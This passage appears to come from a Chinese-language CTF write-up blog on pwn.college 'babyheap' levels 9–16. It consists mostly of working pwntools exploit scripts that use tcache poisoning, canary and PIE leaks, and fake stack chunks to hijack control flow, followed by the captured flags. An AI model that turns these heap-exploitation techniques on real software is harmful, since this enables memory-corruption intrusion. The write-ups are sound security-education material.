    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", secret)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    secret_p1 = elf.bss() + (0x12821 - 0x8)
    secret_p2 = elf.bss() + 0x12821

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret_p1))
    # raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 0)

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret_p2))
    # raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 0)

    payload = flat(0, 0)
    send_flag(payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{YpgPY9CRd5Wk4FCJ7klY0D4fwXX.0FO4MDL5cTNxgzW}]

Level 10.0

Information

Category: Pwn

Description

Leverage TCACHE exploits to gain control flow.

Write-up

这题嘛，保护全开，但是直接泄漏给我们栈地址和程序代码段地址了，发现后门函数 win，那想法自然是令 malloc 返回栈地址，然后我们 scanf 向栈内输入数据溢出返回地址 balabala ～

由于程序使用了 malloc_usable_size 来确定输入大小，所以我们还得伪造一个 chunk size 来欺骗这个函数，才能得到足够的输入空间。此外，canary 也需要我们提前泄漏出来。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level10.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.recvuntil(b"allocations is at: ")
    stack = int(target.recvline().strip()[:-1], 16)
    target.recvuntil(b"main is at: ")
    pie_base = int(target.recvline().strip()[:-1], 16) - 0x1AFD

    fake_chunk = stack + 0x10
    canary = stack + 0x108
    win = pie_base + 0x1A00

    target.success(f"stack: {hex(stack)}")
    target.success(f"pie_base: {hex(pie_base)}")
    target.success(f"fake_chunk: {hex(fake_chunk)}")
    target.success(f"canary: {hex(canary)}")
    target.success(f"win: {hex(win)}")

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)

    # raw_input("DEBUG")
    scanf(0, p64(canary + 1))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)
    target.recvuntil(b"Data: ")
    canary = int.from_bytes(target.recvline().strip().rjust(0x8, b"\x00"), "little")
    target.success(f"canary: {hex(canary)}")

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    # raw_input("DEBUG")
    scanf(0, p64(stack))
    malloc(0, 0)
    malloc(0, 0)

    # fake chunk
    payload = flat(
        0,
        0x200, # chunk size
    )
    scanf(0, payload)

    malloc(2, 0)
    malloc(3, 0)
    free(3)
    free(2)
    # raw_input("DEBUG")
    scanf(2, p64(fake_chunk))
    malloc(2, 0)
    malloc(2, 0)

    payload = flat(
        b"A" * 0xF8,
        canary,
        0,  # rbp
        win,
    )
    # raw_input("DEBUG")
    scanf(2, payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{0qLPdKCSvtNobMR6JycB-1ThuJM.0VO4MDL5cTNxgzW}]

Level 10.1

Information

Category: Pwn

Description

Leverage TCACHE exploits to gain control flow.

Write-up

参见 Level 10.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level10.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.recvuntil(b"allocations is at: ")
    stack = int(target.recvline().strip()[:-1], 16)
    target.recvuntil(b"main is at: ")
    pie_base = int(target.recvline().strip()[:-1], 16) - 0x1AFD

    fake_chunk = stack + 0x10
    canary = stack + 0x108
    win = pie_base + 0x1A00

    target.success(f"stack: {hex(stack)}")
    target.success(f"pie_base: {hex(pie_base)}")
    target.success(f"fake_chunk: {hex(fake_chunk)}")
    target.success(f"canary: {hex(canary)}")
    target.success(f"win: {hex(win)}")

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)

    # raw_input("DEBUG")
    scanf(0, p64(canary + 1))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)
    target.recvuntil(b"Data: ")
    canary = int.from_bytes(target.recvline().strip().rjust(0x8, b"\x00"), "little")
    target.success(f"canary: {hex(canary)}")

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    # raw_input("DEBUG")
    scanf(0, p64(stack))
    malloc(0, 0)
    malloc(0, 0)

    # fake chunk
    payload = flat(
        0,
        0x200,  # chunk size
    )
    scanf(0, payload)

    malloc(2, 0)
    malloc(3, 0)
    free(3)
    free(2)
    # raw_input("DEBUG")
    scanf(2, p64(fake_chunk))
    malloc(2, 0)
    malloc(2, 0)

    payload = flat(
        b"A" * 0xF8,
        canary,
        0,  # rbp
        win,
    )
    # raw_input("DEBUG")
    scanf(2, payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{IVJX2ecO9cCeTd-08IgNfDhvyxY.0FM5MDL5cTNxgzW}]

Level 11.0

Information

Category: Pwn

Description

Leverage TCACHE exploits to gain control flow.

Write-up

和上题类似的 goal，控制返回地址为 win 即可。但是这次没有告诉我们任何地址，需要手动泄漏栈地址和程序基地址。

那还不简单，echo 可以泄漏 ptr 中的地址加上偏移处的值，如果我们知道了栈地址，那只要令 ptr 中保存栈地址我们就可以泄漏任意偏移处的值了。

:::important 做这题的时候突然发现 scanf("%0s", buf) 其实是可以接收输入的，%0s 是未定义行为，会接收任意大小输入……我本来以为不行，还想在栈上伪造 chunk 来着，现在知道原来没必要。所以我们最后直接覆盖 scanf 的返回地址就好了，连 canary 都不需要泄漏…… :::

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level11.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def echo(idx, offset):
    target.sendlineafter(b": ", b"echo")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Offset: ", str(offset).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x20)
    free(0)

    # leak stack address
    # raw_input("DEBUG")
    echo(0, 0x8)
    target.recvuntil(b"Data: ")
    stack = (
        int.from_bytes(target.recvline().strip().ljust(0x8, b"\x00"), "little") + 0x6
    )
    target.success(f"stack: {hex(stack)}")

    malloc(0, 0x20)
    malloc(1, 0x20)
    free(1)
    free(0)
    # raw_input("DEBUG")
    scanf(0, p64(stack))
    malloc(0, 0x20)
    malloc(0, 0x20)  # slot 0 store stack addr

    # leak canary (not necessary)
    # echo(0, 0x1)
    # target.recvuntil(b"Data: ")
    # canary = int.from_bytes(target.recvline()[:7].rjust(0x8, b"\x00"), "little")
    # target.success(f"canary: {hex(canary)}")

    # leak pie
    echo(0, 0x10)
    target.recvuntil(b"Data: ")
    pie = (
        int.from_bytes(target.recvline().strip().ljust(0x8, b"\x00"), "little") - 0x214E
    )
    win = pie + 0x1B00
    target.success(f"pie: {hex(pie)}")
    target.success(f"win: {hex(win)}")

    payload = flat(
        b"A" * 0x10,
        win,
    )
    # raw_input("DEBUG")
    scanf(0, payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{UR1cj-fm89XIenUymGEuLXjbqDw.0VM5MDL5cTNxgzW}]

Level 11.1

Information

Category: Pwn

Description

Leverage TCACHE exploits to gain control flow.

Write-up

参见 Level 11.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level11.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def echo(idx, offset):
    target.sendlineafter(b": ", b"echo")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Offset: ", str(offset).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x20)
    free(0)

    # leak stack address
    # raw_input("DEBUG")
    echo(0, 0x8)
    target.recvuntil(b"Data: ")
    stack = (
        int.from_bytes(target.recvline().strip().ljust(0x8, b"\x00"), "little") + 0x6
    )
    target.success(f"stack: {hex(stack)}")

    malloc(0, 0x20)
    malloc(1, 0x20)
    free(1)
    free(0)
    # raw_input("DEBUG")
    scanf(0, p64(stack))
    malloc(0, 0x20)
    malloc(0, 0x20)  # slot 0 store stack addr

    # leak canary (not necessary)
    # echo(0, 0x1)
    # target.recvuntil(b"Data: ")
    # canary = int.from_bytes(target.recvline()[:7].rjust(0x8, b"\x00"), "little")
    # target.success(f"canary: {hex(canary)}")

    # leak pie
    echo(0, 0x10)
    target.recvuntil(b"Data: ")
    pie = (
        int.from_bytes(target.recvline().strip().ljust(0x8, b"\x00"), "little") - 0x1A93
    )
    win = pie + 0x1500
    target.success(f"pie: {hex(pie)}")
    target.success(f"win: {hex(win)}")

    payload = flat(
        b"A" * 0x10,
        win,
    )
    # raw_input("DEBUG")
    scanf(0, payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{IHuI-DZpMG1vv3R_3f2K4lz3jgL.0lM5MDL5cTNxgzW}]

Level 12.0

Information

Category: Pwn

Description

Leverage TCACHE exploits to cause malloc() to return a stack pointer.

Write-up

~太简单，直接看我 exp 好了。~

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level12.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def stack_free():
    target.sendlineafter(b": ", b"stack_free")


def stack_scanf(data):
    target.sendlineafter(b": ", b"stack_scanf")
    target.sendline(data)


def stack_malloc_win():
    target.sendlineafter(b": ", b"stack_malloc_win")


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x20)

    payload = flat(
        b"A" * 0x30,
        0,
        0x30,
    )
    # raw_input("DEBUG")
    stack_scanf(payload)
    # raw_input("DEBUG")
    stack_free()

    free(0)
    # raw_input("DEBUG")
    puts(0)
    target.recvuntil(b"Data: ")
    stack = int.from_bytes(target.recvline().strip().ljust(0x8, b"\x00"), "little")
    target.success(f"stack: {hex(stack)}")

    malloc(0, 0x6A)
    malloc(1, 0x6A)
    free(1)
    free(0)
    # raw_input("DEBUG")
    scanf(0, p64(stack))
    malloc(0, 0x6A)
    stack_malloc_win()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{QmZQE_PykX5z-wedw-snh6CwwtV.01M5MDL5cTNxgzW}]

Level 12.1

Information

Category: Pwn

Description

Leverage TCACHE exploits to cause malloc() to return a stack pointer.

Write-up

参见 Level 12.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level12.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def stack_free():
    target.sendlineafter(b": ", b"stack_free")


def stack_scanf(data):
    target.sendlineafter(b": ", b"stack_scanf")
    target.sendline(data)


def stack_malloc_win():
    target.sendlineafter(b": ", b"stack_malloc_win")


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x20)

    payload = flat(
        b"A" * 0x30,
        0,
        0x30,
    )
    # raw_input("DEBUG")
    stack_scanf(payload)
    # raw_input("DEBUG")
    stack_free()

    free(0)
    # raw_input("DEBUG")
    puts(0)
    target.recvuntil(b"Data: ")
    stack = int.from_bytes(target.recvline().strip().ljust(0x8, b"\x00"), "little")
    target.success(f"stack: {hex(stack)}")

    malloc(0, 0x43)
    malloc(1, 0x43)
    free(1)
    free(0)
    # raw_input("DEBUG")
    scanf(0, p64(stack))
    malloc(0, 0x43)
    stack_malloc_win()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:sopiler[pwn.college{wIhhQLe35f_W9wFoYZAeO6TJPGe.0FN5MDL5cTNxgzW}]

Level 13.0

Information

Category: Pwn

Description

Leverage calling free() on a stack pointer to read secret data.

Write-up

~我们迎来了最简单的一集。~

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level13.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", str(secret).encode())


def stack_free():
    target.sendlineafter(b": ", b"stack_free")


def stack_scanf(data):
    target.sendlineafter(b": ", b"stack_scanf")
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"A" * 0x30,
        0,
        0x401,
    )

    stack_scanf(payload)
    stack_free()
    # raw_input("DEBUG")
    malloc(0, 0x3F0)

    payload = flat(
        b"A" * (0xB0),
    )
    raw_input("DEBUG")
    scanf(0, payload)

    send_flag("A" * 0x10)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{Yz7oh0MVsBoSFEkrl1pl76sH5l0.0VN5MDL5cTNxgzW}]

Level 13.1

Information

Category: Pwn

Description

Leverage calling free() on a stack pointer to read secret data.

Write-up

参见 Level 13.0。

~有时候我真的觉得自己在增加碳排放，但是我不想删了全改了，先将就沿袭一下传统吧，下次一定修改风格，下次一定（~

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level13.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", str(secret).encode())


def stack_free():
    target.sendlineafter(b": ", b"stack_free")


def stack_scanf(data):
    target.sendlineafter(b": ", b"stack_scanf")
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"A" * 0x30,
        0,
        0x401,
    )

    stack_scanf(payload)
    stack_free()
    # raw_input("DEBUG")
    malloc(0, 0x3F0)

    payload = flat(
        b"A" * (0xB0),
    )
    raw_input("DEBUG")
    scanf(0, payload)

    send_flag("A" * 0x10)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{AzMm2HpvBwKXfmMU3AoN5SEUd4H.0lN5MDL5cTNxgzW}]

Level 14.0

Information

Category: Pwn

Description

Leverage TCACHE exploits to obtain the flag.

Write-up

有啥不一样吗？？我之前也是这么做的……

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level14.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def echo(idx, offset):
    target.sendlineafter(b": ", b"echo")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Offset: ", str(offset).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def stack_free():
    target.sendlineafter(b": ", b"stack_free")


def stack_scanf(data):
    target.sendlineafter(b": ", b"stack_scanf")
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"A" * 0x30,
        0,
        0x401,
    )
    stack_scanf(payload)
    stack_free()

    malloc(0, 0x3F0)
    echo(0, 0x18)
    target.recvuntil(b"Data: ")
    pie = int.from_bytes(target.recvline().strip(), "little") - 0x22DD
    win = pie + 0x1A22

    echo(0, 0x49)
    target.recvuntil(b"Data: ")
    canary = int.from_bytes(target.recvline().strip().rjust(0x8, b"\x00"), "little")

    target.success(f"pie: {hex(pie)}")
    target.success(f"win: {hex(win)}")
    target.success(f"canary: {hex(canary)}")

    payload = flat(
        b"A" * 0x48,
        canary,
        0,
        win,
    )
    raw_input("DEBUG")
    scanf(0, payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{wQRsnVfxcvBTDBM8-XLGPXFLyGF.01N5MDL5cTNxgzW}]

Level 14.1

Information

Category: Pwn

Description

Leverage TCACHE exploits to obtain the flag.

Write-up

参见 Level 14.0。

:::important Theres a golden meme, also, ask this man isspace。 :::

~总结，热心群友们个个都是谜语大师，相信他们给出的 tips 绝对是正确，够用的 xD~

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level14.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def echo(idx, offset):
    target.sendlineafter(b": ", b"echo")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Offset: ", str(offset).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def stack_free():
    target.sendlineafter(b": ", b"stack_free")


def stack_scanf(data):
    target.sendlineafter(b": ", b"stack_scanf")
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"A" * 0x30,
        0,
        0x401,
    )
    stack_scanf(payload)
    stack_free()

    malloc(0, 0x3F0)
    echo(0, 0x18)
    target.recvuntil(b"Data: ")
    pie = int.from_bytes(target.recvline().strip(), "little") - 0x1B8D
    win = pie + 0x1409 + 5

    echo(0, 0x49)
    target.recvuntil(b"Data: ")
    canary = int.from_bytes(target.recvline().strip().rjust(0x8, b"\x00"), "little")

    target.success(f"pie: {hex(pie)}")
    target.success(f"win: {hex(win)}")
    target.success(f"canary: {hex(canary)}")

    payload = flat(
        b"A" * 0x48,
        canary,
        0,
        win,
    )
    raw_input("DEBUG")
    scanf(0, payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{89yuVXIylEt3d84DgpKZsDAT2ew.0FO5MDL5cTNxgzW}]

Level 15.0

Information

Category: Pwn

Description

Leverage TCACHE exploits to obtain the flag.

Write-up

UAF 被 ban 又怎样？照样拿捏。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level15.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def echo(idx, offset):
    target.sendlineafter(b": ", b"echo")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Offset: ", str(offset).encode())


def read(idx, size):
    target.sendlineafter(b": ", b"read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0)
    echo(0, 0x28)

    target.recvuntil(b"Data: ")
    stack = int.from_bytes(target.recvline().strip(), "little")
    main_ret_addr = stack + 0x176

    echo(0, 0x50)
    target.recvuntil("Data: ")
    pie = int.from_bytes(target.recvline().strip(), "little") - 0x33F8
    win = pie + elf.sym["win"]

    target.success(f"stack: {hex(stack)}")
    target.success(f"pie: {hex(pie)}")
    target.success(f"win: {hex(win)}")

    malloc(0, 0)
    malloc(1, 0)
    malloc(2, 0)
    free(2)
    free(1)
    # raw_input("DEBUG")
    read(0, 0x1337)

    payload = flat(
        b"A" * 0x20,
        main_ret_addr,
    )
    target.sendline(payload)

    malloc(0, 0)
    # raw_input("DEBUG")
    malloc(0, 0)

    read(0, 0x1337)
    target.sendline(p64(win))
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{QyYR-Pj8vuLZgMayMcB0QHW1DKk.0VO5MDL5cTNxgzW}]

Level 15.1

Information

Category: Pwn

Description

Leverage TCACHE exploits to obtain the flag.

Write-up

参见 Level 15.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level15.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def echo(idx, offset):
    target.sendlineafter(b": ", b"echo")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Offset: ", str(offset).encode())


def read(idx, size):
    target.sendlineafter(b": ", b"read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0)
    echo(0, 0x28)

    target.recvuntil(b"Data: ")
    stack = int.from_bytes(target.recvline().strip(), "little")
    main_ret_addr = stack + 0x176

    raw_input("DEBUG")
    echo(0, 0x50)
    target.recvuntil("Data: ")
    pie = int.from_bytes(target.recvline().strip(), "little") - 0x2110
    win = pie + elf.sym["win"]

    target.success(f"stack: {hex(stack)}")
    target.success(f"pie: {hex(pie)}")
    target.success(f"win: {hex(win)}")

    malloc(0, 0)
    malloc(1, 0)
    malloc(2, 0)
    free(2)
    free(1)
    # raw_input("DEBUG")
    read(0, 0x1337)

    payload = flat(
        b"A" * 0x20,
        main_ret_addr,
    )
    target.sendline(payload)

    malloc(0, 0)
    # raw_input("DEBUG")
    malloc(0, 0)

    read(0, 0x1337)
    target.sendline(p64(win))
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{sqd-yJZ1_DJOrzpwErrz-Y_4Jw1.0FMwQDL5cTNxgzW}]

Level 16.0

Information

Category: Pwn

Description

Revisit a prior challenge, now with TCACHE safe-linking.

Write-up

Description 已经说的很清楚了，就是前面某个 challenge 的修订版，safe-linking 是 2.32 加入的，这个 chall 使用的是 2.35，但是区别不大，safe-linking 一直到现在最新的 2.42 都没怎么变过。

没学过 safe-linking 的可以看我写的解链之诗：堆上咒语的逆诵。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level16.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", str(secret).encode())


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
